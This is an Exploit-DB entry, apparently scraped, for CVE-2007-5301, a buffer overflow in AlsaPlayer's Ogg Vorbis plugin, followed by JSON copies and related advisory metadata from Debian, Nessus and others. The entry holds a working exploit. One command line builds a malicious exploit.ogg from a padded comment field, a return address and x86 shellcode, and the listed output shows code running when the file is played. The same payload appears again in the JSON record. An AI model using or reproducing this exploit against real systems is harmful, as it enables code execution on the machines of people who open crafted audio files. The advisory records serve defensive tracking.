Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit
2008-04-10T00:00:00
ID EDB-ID:5424 Type exploitdb Reporter Albert Sellares Modified 2008-04-10T00:00:00
Description
Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit. CVE-2007-5301. Local exploit for linux platform
I have released this exploit for the alsaplayer bug CVE-2007-5301.
You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/
With my modified version of vorbiscomment, you can generate a ogg exploit like this:
whats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\x77\xe7
\xff\xff\x08\x08\x08\x08\x29\xc9\x83\xe9\xf4\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e
\x46\x90\xbe\x13\x83\xee\xfc\xe2\xf4\x2c\x9b\xe6\x8a\x14\xf6\xd6\x3e\x25\x19\x59\x7b
\x69\xe3\xd6\x13\x2e\xbf\xdc\x7a\x28\x19\x5d\x41\xae\x9c\xbe\x13\x46\xbf\xcb\x60\x34
\xbf\xdc\x7a\x28\xbf\xd7\x77\x46\xc7\xed\x9a\xa7\x5d\x3e\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg
Then, if you plays the file with the vulnerable version:
whats@debian:~$ alsaplayer exploit.ogg
uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
This was tested with the debian etch packages.
- whats
# milw0rm.com [2008-04-10]
{"bulletinFamily": "exploit", "id": "EDB-ID:5424", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-10T00:00:00", "lastseen": "2016-01-31T23:06:14", "edition": 1, "sourceData": "I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print \"AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\r\n\r\n# milw0rm.com [2008-04-10]\r\n", "published": "2008-04-10T00:00:00", "href": "https://www.exploit-db.com/exploits/5424/", "osvdbidlist": [], "reporter": "Albert Sellares", "hash": "7d58477a118e391dd57a66e35ed9f188b7a38584a52aef59948e151774e4a36c", "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit. CVE-2007-5301. Local exploit for linux platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5424/", "enchantments": {"vulnersScore": 7.2}}
{"result": {"cve": [{"id": "CVE-2007-5301", "type": "cve", "title": "CVE-2007-5301", "description": "Buffer overflow in the vorbis_stream_info function in input/vorbis/vorbis_engine.c (aka the vorbis input plugin) in AlsaPlayer before 0.99.80-rc3 allows remote attackers to execute arbitrary code via a .OGG file with long comments.", "published": "2007-10-09T14:17:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5301", "cvelist": ["CVE-2007-5301"], "lastseen": "2017-09-29T14:25:33"}], "nessus": [{"id": "DEBIAN_DSA-1538.NASL", "type": "nessus", "title": "Debian DSA-1538-1 : alsaplayer - buffer overrun", "description": "Erik Sjolund discovered a buffer overflow vulnerability in the Ogg Vorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a maliciously crafted Vorbis file could lead to the execution of arbitrary code.", "published": "2008-04-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=31808", "cvelist": ["CVE-2007-5301"], "lastseen": "2017-10-29T13:42:09"}], "packetstorm": [{"id": "PACKETSTORM:65385", "type": "packetstorm", "title": "alsaplayer-overflow.txt", "description": "", "published": "2008-04-10T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/65385/alsaplayer-overflow.txt.html", "cvelist": ["CVE-2007-5301"], "lastseen": "2016-12-05T22:22:16"}], "openvas": [{"id": "OPENVAS:60785", "type": "openvas", "title": "Debian Security Advisory DSA 1538-1 (alsaplayer)", "description": "The remote host is missing an update to alsaplayer\nannounced via advisory DSA 1538-1.", "published": "2008-04-21T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=60785", "cvelist": ["CVE-2007-5301"], "lastseen": "2017-07-24T12:50:07"}], "debian": [{"id": "DSA-1538", "type": "debian", "title": "alsaplayer -- buffer overrun", "description": "Erik Sj\u00f6lund discovered a buffer overflow vulnerability in the Ogg Vorbis input plugin of the alsaplayer audio playback application. Successful exploitation of this vulnerability through the opening of a maliciously crafted Vorbis file could lead to the execution of arbitrary code.\n\nFor the stable distribution (etch), the problem has been fixed in version 0.99.76-9+etch1.\n\nFor the unstable distribution (sid), the problem was fixed in version 0.99.80~rc4-1.\n\nWe recommend that you upgrade your alsaplayer packages.", "published": "2008-04-04T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.debian.org/security/dsa-1538", "cvelist": ["CVE-2007-5301"], "lastseen": "2016-09-02T18:30:05"}], "seebug": [{"id": "SSV:65318", "type": "seebug", "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-65318", "cvelist": ["CVE-2007-5301"], "lastseen": "2017-11-19T13:53:01"}, {"id": "SSV:8307", "type": "seebug", "title": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit", "description": "No description provided by source.", "published": "2008-04-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-8307", "cvelist": ["CVE-2007-5301"], "lastseen": "2017-11-19T21:49:04"}], "exploitdb": [{"id": "EDB-ID:30648", "type": "exploitdb", "title": "AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability", "description": "AlsaPlayer 0.99.x Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability. CVE-2007-5301. Dos exploit for linux platform", "published": "2007-10-08T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/30648/", "cvelist": ["CVE-2007-5301"], "lastseen": "2016-02-03T12:48:10"}]}}
